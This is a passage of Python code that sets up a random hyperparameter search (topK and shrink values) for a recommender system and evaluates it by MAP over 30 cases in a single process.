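        DictionaryKeys.CONSTRUCTOR_KEYWORD_ARGS: {},
        DictionaryKeys.FIT_POSITIONAL_ARGS: [],
        DictionaryKeys.FIT_KEYWORD_ARGS: {},
        DictionaryKeys.FIT_RANGE_KEYWORD_ARGS: {"topK": [50, 100, 200],
                                                "shrink": [0, 10, 50]},
    }

    searcher = RandomSearch(recommender_class,
                            URM_test=URM_test,
                            evaluation_function_validation=evaluate_fn)

    # parallelize=False keeps everything in the current process, which is the
    # simpler of the two code paths implemented above.
    return searcher.search(dictionary_input,
                           metric="map",
                           n_cases=30,
                           output_root_path="result_experiments/example",
                           parallelize=False)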